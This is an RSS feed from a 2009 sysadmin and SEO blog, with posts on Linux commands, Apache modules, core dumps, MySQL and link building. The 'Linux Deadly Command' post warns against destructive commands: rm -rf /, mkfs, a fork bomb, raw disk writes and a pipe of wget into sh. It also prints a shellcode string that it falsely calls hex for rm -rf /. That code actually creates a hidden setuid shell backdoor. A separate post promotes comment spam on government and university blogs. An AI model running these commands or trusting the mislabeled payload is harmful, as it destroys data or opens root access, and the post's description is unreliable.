<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Apache, Linux ,Seo tricks and many more</title>
	<atom:link href="http://www.gossiplime.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gossiplime.com</link>
	<description>This blog is just for all persons to know more about php, apache , linux , seo etc</description>
	<lastBuildDate>Wed, 08 Jul 2009 16:40:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Remove / Delete  a Directory Linux Command</title>
		<link>http://www.gossiplime.com/2009/06/remove-delete-a-directory-linux-command/</link>
		<comments>http://www.gossiplime.com/2009/06/remove-delete-a-directory-linux-command/#comments</comments>
		<pubDate>Wed, 24 Jun 2009 15:50:02 +0000</pubDate>
		<dc:creator>sps</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[delete]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=326</guid>
		<description><![CDATA[Delete / Remove a Directory Linux Command Q. I am new to Linux and command line. How do I delete or remove a directory? A. Use rmdir command. This command remove the DIRECTORY(ies), if they are empty. For example, type the following command to remove /tmp/docs directory: $ rmdir /tmp/docs If directory is not empty [...]]]></description>
			<content:encoded><![CDATA[<div>
<h1>Delete / Remove a Directory Linux Command</h1>
</div>
<div style="float: right; margin-top: 0px; margin-left: 5px;"><a title="See all GNU/Linux related FAQ" href="http://www.cyberciti.biz/faq/category/linux/"><br />
</a></div>
<p><span style="color: #ff0000;">Q</span>. I am new to Linux and command line. How do I delete or remove a directory?</p>
<p><span style="color: #009900;">A</span>. Use rmdir command. This command remove the DIRECTORY(ies), if they are empty. For example, type the following command to remove /tmp/docs directory:</p>
<p><strong>$ rmdir /tmp/docs</strong><br />
If directory is not empty you will get an error:<br />
<code>$ rmdir letters</code><br />
Output:</p>
<pre>rmdir: letters: Directory not empty</pre>
<p>You can change directory to find out files:<br />
<code>$ cd letters<br />
$ ls</code></p>
<h2>Linux remove entire directory</h2>
<p>To remove all directories and subdirectories use rm command. For example remove letters and all subdirectories and files inside this directory, type the following command:<br />
<code>$ rm -rf letters/</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/06/remove-delete-a-directory-linux-command/feed/</wfw:commentRss>
		<slash:comments>60</slash:comments>
		</item>
		<item>
		<title>How do I remove all empty directories?</title>
		<link>http://www.gossiplime.com/2009/06/how-do-i-remove-all-empty-directories/</link>
		<comments>http://www.gossiplime.com/2009/06/how-do-i-remove-all-empty-directories/#comments</comments>
		<pubDate>Wed, 24 Jun 2009 15:40:53 +0000</pubDate>
		<dc:creator>sps</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[commands]]></category>
		<category><![CDATA[delete]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=322</guid>
		<description><![CDATA[You can use program called cleanlinks. The cleanlinks program searches the directory tree descended from the current directory for symbolic links whose targets do not exist, and removes them. It then removes all empty directories in that directory tree. It was originally created for symbolic links based directories but works with normal directories too. For [...]]]></description>
			<content:encoded><![CDATA[<p>You can use program called cleanlinks. The cleanlinks program searches the directory tree descended from the current directory for symbolic links whose targets do not exist, and removes them. It then removes all empty directories in that directory tree. It was originally created for symbolic links based directories but works with normal directories too.</p>
<p>For example if you want to remove all empty directories from /tmp directory, type the command:</p>
<blockquote><p>$ cd /tmp<br />
$ cleanlinks</p></blockquote>
<p>Please note that cleanlinks command is part of XFree86 project. Another method is to use combination of shell commands in script:</p>
<blockquote><p>#/bin/bash<br />
DIR=&#8221;$1&#8243;<br />
[ -d $DIR ] &amp;&amp; [ $(ls -l $DIR | wc -l) -eq 1  ] &amp;&amp; rmdir $DIR ||  :</p></blockquote>
<p>Save and execute a script:</p>
<blockquote><p>$ script.sh dir1</p></blockquote>
<p>You can also try out tmpreaper command which recursively searches for and removes files and empty directories which haven&#8217;t been accessed for a given number of seconds. Normally, it&#8217;s used to clean up directories which are used for temporary holding space, such as &#8220;/tmp&#8221;. Syntax is as follows:<br />
<strong>tmpreaper TIME-FORMAT DIRS</strong></p>
<p>Where,</p>
<ul>
<li>TIME-FORMAT : Defines the age threshold for removing files. The TIME-FORMAT should be a number, defaulting to hours, optionally suffixed by one character: d for days, h for hours, m for minutes, or s for seconds.</li>
<li>DIRS : Directory name for example /tmp</li>
</ul>
<p>For example, remove all files accessed 24h before:</p>
<p># tmpreaper 24h /tmp</p>
<p>Please note that tmpreaper command is not installed by default you may need to install it using apt-get or rpm command.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/06/how-do-i-remove-all-empty-directories/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>ls: command options</title>
		<link>http://www.gossiplime.com/2009/03/316/</link>
		<comments>http://www.gossiplime.com/2009/03/316/#comments</comments>
		<pubDate>Wed, 25 Mar 2009 01:02:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Apache]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=316</guid>
		<description><![CDATA[ls: command options Option Action -a                  list hidden files -d                  list the name of the current directory -F                  show directories with a trailing &#8216;/&#8217; executable files with a trailing &#8216;*&#8217; -g                  show group ownership of file in long listing -i                  print the inode number of [...]]]></description>
			<content:encoded><![CDATA[<p><strong>ls: command options</strong></p>
<p><strong>Option</strong> <strong>Action</strong></p>
<p>-a                  list hidden files</p>
<p>-d                  list the name of the current directory</p>
<p>-F                  show directories with a trailing &#8216;/&#8217;<br />
executable files with a trailing &#8216;*&#8217;</p>
<p>-g                  show group ownership of file in long listing</p>
<p>-i                  print the inode number of each file</p>
<p>-l                  long listing giving details about files<br />
and directories</p>
<p>-R                  list all subdirectories encountered</p>
<p>-t                  sort by time modified instead of name</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/316/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Install mod_bandwidth</title>
		<link>http://www.gossiplime.com/2009/03/install-mod_bandwidth/</link>
		<comments>http://www.gossiplime.com/2009/03/install-mod_bandwidth/#comments</comments>
		<pubDate>Mon, 23 Mar 2009 16:46:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apache]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[mod_bandwidth]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=308</guid>
		<description><![CDATA[What is Mod_Bandwidth &#8220;Mod_bandwidth&#8221; (mod bandwidth) is a module for the Apache webserver that enable the setting of server-wide or per connection bandwidth limits, based on the directory, size of files and remote IP/domain. For Apache 1.3x. ONLY! This how-to is not compatible with old versions of apache, including but not limited to 1.3beta How [...]]]></description>
			<content:encoded><![CDATA[<p><strong>What is Mod_Bandwidth</strong></p>
<p>&#8220;Mod_bandwidth&#8221; (mod bandwidth) is a module for the Apache webserver that enable the setting of server-wide or per connection bandwidth limits, based on the directory, size of files and remote IP/domain.</p>
<p>For Apache 1.3x. ONLY! This how-to is not compatible with old versions of apache, including but not limited to 1.3beta</p>
<p><span style="color: #333399;"><strong>How to install mod_bandwidth</strong></span></p>
<p>1. Login to your server via SSH as root.</p>
<p>2. Type: mkdir /root/mod_bw</p>
<p>3. Type: cd /root/mod_bw</p>
<p>4. Type: wget ftp://ftp.cohprog.com/pub/apache/module/1.3.0/mod_bandwidth.c</p>
<p>5. Type: /usr/local/apache/bin/apxs -c /root/mod_bw/mod_bandwidth.c -o /usr/local/apache/libexec/mod_bandwidth.so</p>
<p>6. Type: mkdir /usr/local/apache/bw_limit</p>
<p>7. Type: mkdir /usr/local/apache/bw_limit/link</p>
<p>8. Type: mkdir /usr/local/apache/bw_limit/master</p>
<p>9. Type: pico -w /etc/httpd/conf/httpd.conf</p>
<p>10. Locate the following Line: LoadModule rewrite_module libexec/mod_rewrite.so</p>
<p>11. <strong>Before</strong> the above line add this:<br />
LoadModule bandwidth_module libexec/mod_bandwidth.so</p>
<p>12. Now locate this line: AddModule mod_env.c</p>
<p>13. <strong>Before</strong> the above line add this:<br />
AddModule mod_bandwidth.c</p>
<p>14. Now locate this line: # Document types.</p>
<p>15. <strong>Before</strong> the above line add this:<br />
BandWidthDataDir &#8220;/usr/local/apache/bw_limit&#8221;<br />
BandWidthModule On</p>
<p>16. To enable mod_bandwidth on a virtual host locate the virtual host entry for the specified domain/acount you wish to limit. Just before the line add the following:<br />
BandWidthModule On<br />
BandWidth all 512</p>
<p>The 512 can be replaced with whatever rate you wish to limit the acount too.</p>
<p>17. Save the file and exit.<br />
CTRL-X then Y then enter.</p>
<p>18. Type: service httpd restart</p>
<p>19. Type: cd /usr/sbin</p>
<p>20. Type: wget ftp://ftp.cohprog.com/pub/apache/module/cleanlink.pl</p>
<p><strong>What is cleanlink?</strong><br />
Cleanlink is a deamon that is used to clean links created by mod_bandwidth when they aren&#8217;t removed properly by the server. (When a httpd process doesn&#8217;t terminate the usual way.)</p>
<p>21. Type: chmod 755 cleanlink.pl</p>
<p>22. Type: pico -w cleanlink.pl</p>
<p>23. Change $LINKDIR to the following:<br />
$LINKDIR=&#8221;/usr/local/apache/bw_limit/link&#8221;;</p>
<p>24. Save the file and exit.<br />
CTRL-X then Y then enter.</p>
<p>25. Type: perl cleanlink.pl</p>
<p>26. Type: pico -w /etc/rc.d/rc.local</p>
<p>27. Scroll down to the very end of the file and add the following:<br />
# The following line Launches CleanLink for Mod_Bandwidth<br />
perl /usr/sbin/cleanlink.pl</p>
<p>28. Save the file and exit.<br />
CTRL-X then Y then enter.</p>
<p>mod_bandwidth has many options. If you wish to modify mod_bandwidth and enable more options please visit the documentation available by the programmer here: http://www.cohprog.com/v3/bandwidth/doc-en.html</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/install-mod_bandwidth/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Stop Coredump file</title>
		<link>http://www.gossiplime.com/2009/03/stop-coredump-file/</link>
		<comments>http://www.gossiplime.com/2009/03/stop-coredump-file/#comments</comments>
		<pubDate>Mon, 23 Mar 2009 10:30:06 +0000</pubDate>
		<dc:creator>sps</dc:creator>
				<category><![CDATA[Apache]]></category>
		<category><![CDATA[apace]]></category>
		<category><![CDATA[coredump]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[httpd]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=139</guid>
		<description><![CDATA[Many webmasters ask me how to stop core dump files in Apache.. Now today i will tell you how to stop core dump file in apache.  This is basically happens when System Crashes it makes a coredump file in the public_html Directory. The possible reason for the core files getting generated is when a php [...]]]></description>
			<content:encoded><![CDATA[<p>Many webmasters ask me how to stop core dump files in Apache.. Now today i will tell you how to stop core dump file in apache.  This is basically happens when System Crashes it makes a coredump file in the public_html Directory.</p>
<p>The possible reason for the core files getting generated is when a php process is killed, apache creates core files under your account .</p>
<p>On phpSuexec servers this may cause due to incorrect php.ini file placed in your account and if it is caused due to php/apache then you can get rid off those core files by editing the httpd startup file on the server end .</p>
<p>Lets start</p>
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="margin-bottom: 2px;">Code:</div>
<pre class="alt2" style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 440px; height: 34px; text-align: left;" dir="ltr">root@server [~]# vi /etc/init.d/httpd</pre>
</div>
<p>Search for ulimit lines .For eg : you can see these lines</p>
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="margin-bottom: 2px;">Code:</div>
<pre class="alt2" style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 440px; height: 82px; text-align: left;" dir="ltr">ulimit -n 1024
ulimit -n 4096
ulimit -n 8192
ulimit -n 16384</pre>
</div>
<p>You need to add ulimit -c 0 at the end .Which will look like :</p>
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="margin-bottom: 2px;">Code:</div>
<pre class="alt2" style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 440px; height: 98px; text-align: left;" dir="ltr">ulimit -n 1024
ulimit -n 4096
ulimit -n 8192
ulimit -n 16384
ulimit -c 0</pre>
</div>
<p>root@server [~]# :wq</p>
<p>Save changes and quit.<br />
Now kill / stop apache service and then start apache service on the server .</p>
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="margin-bottom: 2px;">Code:</div>
<pre class="alt2" style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 440px; height: 114px; text-align: left;" dir="ltr">root@server [~]# service httpd stop
root@server [~]# service httpd stop
httpd (no pid file) not running
root@server [~]# service httpd startssl
root@server [~]# service httpd startssl
httpd (pid 21154) already running</pre>
</div>
<p>Finished <img src='http://www.gossiplime.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>It works most of the OS.</p>
<p>Self tested on CENTOS 5.2 i686 on standard</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/stop-coredump-file/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Link Building</title>
		<link>http://www.gossiplime.com/2009/03/link-building/</link>
		<comments>http://www.gossiplime.com/2009/03/link-building/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 19:50:02 +0000</pubDate>
		<dc:creator>vinod</dc:creator>
				<category><![CDATA[SEO]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[comment]]></category>
		<category><![CDATA[link]]></category>
		<category><![CDATA[link building]]></category>
		<category><![CDATA[tool]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=301</guid>
		<description><![CDATA[In every webmaster forum and blog out there, the community always goes nuts over finding ways to get universities and government sites to link to you. This post is dedicated to helping those people save their money and allow them to get an unlimited amount of .edu and .gov links for free, all through the [...]]]></description>
			<content:encoded><![CDATA[<p>In every webmaster forum and blog out there, the community always goes nuts over finding ways to get universities and government sites to link to you. This post is dedicated to helping those people save their money and allow them to get an unlimited amount of .edu and .gov links for free, all through the power of google!</p>
<p>The ’site:’ feature in Google allows only results with that domain name or domain extension to show up. You can “hack” this feature to allow Google to find the most relevant university and government websites related to your sites.</p>
<p>Examples:<br />
Google query: <a href="http://www.google.com/search?q=site:.gov blog" target="_self">site:.gov</a> blog [or <a href="http://www.google.com/search?q=site%3A.edu+blog">site:.edu</a> blog]<br />
Results in: Google finds any .gov website that is running a blog or has a /blog/ directory. You can then visit these blogs and post comments (if you can find wordpress blogs like this one), and get hundreds of free .gov backlinks.<br />
[Alternative queries: 'blog' 'blogs' 'wordpress' 'comment' 'guestbook' '2007' '2006']</p>
<p>Google query: site:.edu *your niche* + blog<br />
For example: site:.edu internet marketing blog<br />
The top result is a .edu blog that links to a non edu blog, but that blog is related and is PR3 and has edu backlinks. That is also a great relevant place to comment, even if it is not directly a .edu. On the other hand, the third result was a PR3 highly related .edu internet marketing blog with zero comments. That is easy .edu backlinks!</p>
<p>You can easily replicate these queries to fit your needs, and it is highly scalable. You can find .edu, .gov, and if you are lucky, .mil blogs. If you are not as picky, you can just search specifically for the blogs without the .edu or .gov extension, and you can find some high pageranked blogs on the first pages of results. Play around with it, enjoy it, it’s free!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/link-building/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>Adding meta tags to blogger</title>
		<link>http://www.gossiplime.com/2009/03/adding-meta-tags-to-blogger/</link>
		<comments>http://www.gossiplime.com/2009/03/adding-meta-tags-to-blogger/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 15:35:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[SEO]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[meta tag]]></category>
		<category><![CDATA[traffic]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=296</guid>
		<description><![CDATA[1.Sign in to your blogger dashboard&#62;click the &#8216;layout&#8217; button 2.Click on the &#8216;Edit html&#8217; tab Here is the code you have to add &#60;meta content=&#8217;DESCRIPTION HERE&#8217; name=&#8217;description&#8217;/&#62; &#60;meta content=&#8217;KEYWORDS HERE&#8217; name=&#8217;keywords&#8217;/&#62; &#60;meta content=&#8217;AUTHOR NAME HERE&#8217; name=&#8217;author&#8217;/&#62; DESCRIPTION HERE:Write your blog description KEYWORDS:Write the keywords of your blog AUTHOR NAME:Write the author&#8217;s name(Your name) 3.Add the [...]]]></description>
			<content:encoded><![CDATA[<p>1.Sign in to your blogger dashboard&gt;click the &#8216;layout&#8217; button</p>
<p>2.Click on the &#8216;Edit html&#8217; tab</p>
<p>Here is the code you have to add</p>
<p>&lt;meta content=&#8217;DESCRIPTION HERE&#8217; name=&#8217;description&#8217;/&gt;<br />
&lt;meta content=&#8217;KEYWORDS HERE&#8217; name=&#8217;keywords&#8217;/&gt;<br />
&lt;meta content=&#8217;AUTHOR NAME HERE&#8217; name=&#8217;author&#8217;/&gt;</p>
<p>DESCRIPTION HERE:Write your blog description<br />
KEYWORDS:Write the keywords of your blog<br />
AUTHOR NAME:Write the author&#8217;s name(Your name)</p>
<p>3.Add the above code just after this</p>
<p>&lt;b:include data=&#8217;blog&#8217; name=&#8217;all-head-content&#8217;/&gt;</p>
<p>Don&#8217;t forget to add description and keywords.<br />
and save the changes.</p>
<p>IMPORTANT:</p>
<p>Several people were filling with just the keywords in the description.DON&#8217;T DO THAT.Google and other search engines will ban your site from the search engines list if you did so.And also,don&#8217;t repeat the keyword more than 3 times.</p>
<p>That&#8217;s it!You have sucessfully added the metatags to your blogger(blogpsot) blog.If you want to check whether you added the meta tags correctly or not,just type &#8216;meta tags analyzer tool&#8217; in the google and you will find so many sites which can check whether you have added the tags correctly or not.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/adding-meta-tags-to-blogger/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Copying a Table</title>
		<link>http://www.gossiplime.com/2009/03/copying-a-table/</link>
		<comments>http://www.gossiplime.com/2009/03/copying-a-table/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 21:21:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mysql]]></category>
		<category><![CDATA[mysql commands]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=290</guid>
		<description><![CDATA[/*create a copy of a table so that you can alter it or experiment with it without endangering the original data */ CREATE TABLE new_table_name SELECT * FROM old_table_name; /* Differences: their names, if the old table had an index (or key), it does not transfer to the new table. only two columns chosen */]]></description>
			<content:encoded><![CDATA[<p>/*create a copy of a table so that you<br />
can alter it or experiment with it without endangering the original<br />
data<br />
*/</p>
<blockquote><p>CREATE TABLE new_table_name<br />
SELECT * FROM old_table_name;</p></blockquote>
<p>/* Differences: their names,<br />
               if the old table had an index (or key), it<br />
does not transfer to the new table.<br />
only two columns chosen<br />
*/</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/copying-a-table/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Linux Deadly Command</title>
		<link>http://www.gossiplime.com/2009/03/linux-deadly-command/</link>
		<comments>http://www.gossiplime.com/2009/03/linux-deadly-command/#comments</comments>
		<pubDate>Tue, 03 Mar 2009 06:32:19 +0000</pubDate>
		<dc:creator>vinod</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[command]]></category>
		<category><![CDATA[deadly]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=287</guid>
		<description><![CDATA[1. Code: CODE rm -rf / This command will recursively and forcefully delete all the files inside the root directory. 2. Code: CODE char esp[] __attribute__ ((section(&#8220;.text&#8221;))) /* e.s.p release */ = &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243; &#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243; &#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243; &#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243; &#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243; &#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243; &#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243; &#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;&#8221;; This is the hex version of [rm -rf /] [...]]]></description>
			<content:encoded><![CDATA[<p>1. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->rm -rf /<!--c2--></div>
<p><!--ec2--></p>
<p><span>This command will recursively and forcefully <span class="IL_LINK_STYLE" style="font-weight: 400; font-size: 13px; color: #0000ff; font-style: normal; font-family: verdana,geneva,lucida,'lucida grande',arial,helvetica,sans-serif; text-decoration: underline;">delete all</span><span> the files inside the <span class="IL_LINK_STYLE" style="font-weight: 400; font-size: 13px; color: #0000ff; font-style: normal; font-family: verdana,geneva,lucida,'lucida grande',arial,helvetica,sans-serif; text-decoration: underline;">root directory</span>.</span></span></p>
<p>2. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->char esp[] __attribute__ ((section(&#8220;.text&#8221;))) /* e.s.p<br />
release */<br />
= &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243;<br />
&#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243;<br />
&#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243;<br />
&#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243;<br />
&#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243;<br />
&#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243;<br />
&#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243;<br />
&#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;&#8221;;<!--c2--></div>
<p><!--ec2--></p>
<p>This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.</p>
<p>3. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->mkfs.ext3 /dev/sda<!--c2--></div>
<p><!--ec2--></p>
<p>This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.</p>
<p>4. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1--> <img src='http://www.gossiplime.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> ){:|:&amp;};:<!--c2--></div>
<p><!--ec2--></p>
<p>Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.</p>
<p>5. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->any_command &gt; /dev/sda<!--c2--></div>
<p><!--ec2--><br />
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.</p>
<p>6. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->wget http://some_untrusted_source -O- | sh<!--c2--></div>
<p><!--ec2--></p>
<p>Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.</p>
<p>7. Code:<br />
<!--c1--></p>
<div class="codetop">CODE</div>
<div class="codemain"><!--ec1-->mv /home/yourhomedirectory/* /dev/null<!--c2--></div>
<p><!--ec2--></p>
<p>This command will move all the files inside your home directory to a place that doesn&#8217;t exist; hence you will never ever see those files again.</p>
<p><span>There are of course other equally deadly <span class="IL_SPAN"><br />
<input name="IL_MARKER" type="hidden" />Linux commands</span> that I fail to include here, so if you have something to add, please share it with us via comment. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/03/linux-deadly-command/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Sandbox</title>
		<link>http://www.gossiplime.com/2009/02/google-sandbox/</link>
		<comments>http://www.gossiplime.com/2009/02/google-sandbox/#comments</comments>
		<pubDate>Fri, 27 Feb 2009 13:02:19 +0000</pubDate>
		<dc:creator>vinod</dc:creator>
				<category><![CDATA[SEO]]></category>
		<category><![CDATA[google sandbox]]></category>
		<category><![CDATA[link building]]></category>
		<category><![CDATA[optmize website]]></category>

		<guid isPermaLink="false">http://www.gossiplime.com/?p=283</guid>
		<description><![CDATA[The Google sandbox is a concept that has been coined to describe the effect that new websites have in Google’s search results. New websites do not behave in the same way in Google’s search results as older, more established websites. It seems that Google is less inclined to rank newer websites until they have proven [...]]]></description>
			<content:encoded><![CDATA[<p>The Google sandbox is a concept that has been coined to describe the effect that new websites have in Google’s search results.</p>
<p>New websites do not behave in the same way in Google’s search results as older, more established websites. It seems that Google is less inclined to rank newer websites until they have proven themselves and gone through a probationary period. This seems to be a period of 90 to 120 days.</p>
<p>This is not to say that everything you do is pointless within this time, it just means that your efforts will probably be put on hold until this period has passed.</p>
<p>The Google sandbox could be used by Google for many things other than just new websites. Google could also use this for websites that it believes are not playing fair or that have suddenly gained large numbers of inward links.</p>
<p>If you have a new website you should make your changes and optimize your website gradually. This includes building links to your website. You should try to build links slowly over time instead of adding a hundred in one sitting. This sudden spike of inward links could cause you problems. It would look unnatural, as links are not normally achieved this fast.</p>
<p>There are several ways you can deal with the Google sandbox and its effects. including:</p>
<p>    * Use an existing older domain name instead of buying a new one.<br />
    * Build links slowly over time<br />
    * Optimize your website slowly<br />
    * In the early days, concentrate on other search engines<br />
    * Utilize pay per click (PPC) for your initial placement</p>
<p>The Google sandbox effect is not a recognized algorithm by Google, it is just a phrase to describe the effect often seen with new websites that have only recently been found by Google.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.gossiplime.com/2009/02/google-sandbox/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

